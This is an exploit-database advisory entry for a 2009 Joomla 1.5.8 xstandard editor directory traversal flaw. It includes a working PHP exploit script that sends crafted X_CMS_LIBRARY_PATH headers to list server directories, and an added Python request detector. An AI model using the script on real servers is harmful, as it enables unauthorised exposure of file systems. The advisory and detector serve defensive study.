Vendor: Joomla
By: irk4z[at]yahoo.pl
CVSS: 7.5 (HIGH)
Vulnerability: Local Directory Traversal
CWE: 22
Product Name: Joomla
Affected Version From: 1.5.2008
Affected Version To: 1.5.2008
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability

This vulnerability allows an attacker to browse directories on the local file system of a server running the vulnerable Joomla version 1.5.8 through the xstandard editor. The attacker sends a specially crafted HTTP request with the X_CMS_LIBRARY_PATH header set to the desired directory, and the server responds with the contents of that directory. This can be exploited to gain access to sensitive information stored on the server.

Mitigation:

Upgrade to the latest version of Joomla.

Exploit-DB raw data:

<?php
/*
 Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability
 
 discovered by: irk4z[at]yahoo.pl
 greets: all friends ;) 
*/

echo "* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln\n";
echo "* discovered by: irk4z[at]yahoo.pl\n";
echo "*\n";
echo "* greets: all friends ;) enjoy!\n";
echo "*------------------------------------------------------------------*\n";

$host = $argv[1];
$path = $argv[2];
$folder = $argv[3];

if (empty($host) || empty($path)) {
	echo "usage: php {$argv[0]} <host> <path> [<folder>]\n";
	echo "       php {$argv[0]} example.org /joomla\n";
	echo "       php {$argv[0]} example.org /joomla ../../\n";
	exit;
}

echo "http://" . $host . $path . "/images/stories/\n\n";

if ( empty($folder) ){
	$lev = "./";
	for( $i = 0; $i <= 7; $i++ ) {
		echo browseFolder($host, $path, $lev);
		$lev .= "../";
	}
} else {
	echo browseFolder($host, $path, $folder);
}

function browseFolder($host, $path, $folder){
	
	$packet = "GET {$path}/plugins/editors/xstandard/attachmentlibrary.php HTTP/1.1\r\n";
	$packet .= "Host: {$host}\r\n";
	$packet .= "X_CMS_LIBRARY_PATH: {$folder}\r\n";
	$packet .= "Connection: Close\r\n\r\n";

	$o = @fsockopen($host, 80);
	if(!$o){
		echo "\n[x] No response...\n";
		die;
	}
	
	fputs($o, $packet);
	while (!feof($o)) $data .= fread($o, 1024);
	fclose($o);
	
	$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
	if ( !empty($_404) ){
		echo "\n[x] 404 Not Found... Maybe wrong path? \n";
		die;
	}
	
	//folders
	preg_match_all("/<baseURL>([^<]+)<\/baseURL>/", $data, $matches);
	//files
	preg_match_all("/<value>([^<]+\.[^<]{3,4})<\/value>/", $data, $matches2);
	
	$matches = array_merge( $matches[1], $matches2[1] );
	
	if ( empty($matches) ){
		$ret = "$folder [x] Failed...\n";
	} else {
		$ret = '';
		foreach( $matches as $tmp){
			$ret .= str_replace("images/stories/", '', str_replace("/./", "/", str_replace("//", "/", urldecode($tmp) ) ) ) . "\n";
		}
	}
	
	return ($ret);
}

?>

# milw0rm.com [2009-01-07]
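
A defender-side check for the request pattern used above, as an added example that is not part of the original advisory or exploit: it flags requests to attachmentlibrary.php whose X_CMS_LIBRARY_PATH header is absolute or contains a `..` segment. The function names and the sample requests are constructed for illustration, and treating a plain `./` value as benign is an assumption.

```python
from urllib.parse import unquote

# Endpoint and header name taken from the request shown above.
TARGET = "/plugins/editors/xstandard/attachmentlibrary.php"
HEADER = "x_cms_library_path"

def parse_request(raw: bytes):
    """Split a raw HTTP request head into (path, {normalised header: value})."""
    lines = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    path = parts[1].split("?", 1)[0] if len(parts) >= 2 else ""
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            # CGI-style servers treat '-' and '_' alike in header names.
            headers[name.strip().lower().replace("-", "_")] = value.strip()
    return path, headers

def is_traversal(value: str) -> bool:
    """True if the path is absolute or contains a '..' segment."""
    decoded = unquote(value).replace("\\", "/")
    if decoded.startswith("/") or decoded[1:2] == ":":
        return True
    return ".." in decoded.split("/")

def flag_request(raw: bytes) -> bool:
    path, headers = parse_request(raw)
    if not unquote(path).lower().endswith(TARGET):
        return False
    value = headers.get(HEADER)
    return value is not None and is_traversal(value)

def sample_request(path, header_line=""):
    # Builds a constructed sample request (not captured traffic).
    extra = header_line + "\r\n" if header_line else ""
    return (f"GET {path} HTTP/1.1\r\nHost: cms.example\r\n{extra}"
            "Connection: close\r\n\r\n").encode("latin-1")

SAMPLES = [
    sample_request("/joomla" + TARGET, "X_CMS_LIBRARY_PATH: ./"),        # in-library
    sample_request("/joomla" + TARGET, "X_CMS_LIBRARY_PATH: ./../../"),  # traversal
    sample_request("/joomla" + TARGET),                                  # no header
    sample_request("/joomla/index.php", "X_CMS_LIBRARY_PATH: ../"),      # other endpoint
]

if __name__ == "__main__":
    for i, raw in enumerate(SAMPLES):
        print(i, "FLAG" if flag_request(raw) else "ok")
```

Standard access logs do not record custom request headers, so a check like this has to run where the full request is visible, such as a reverse proxy or WAF.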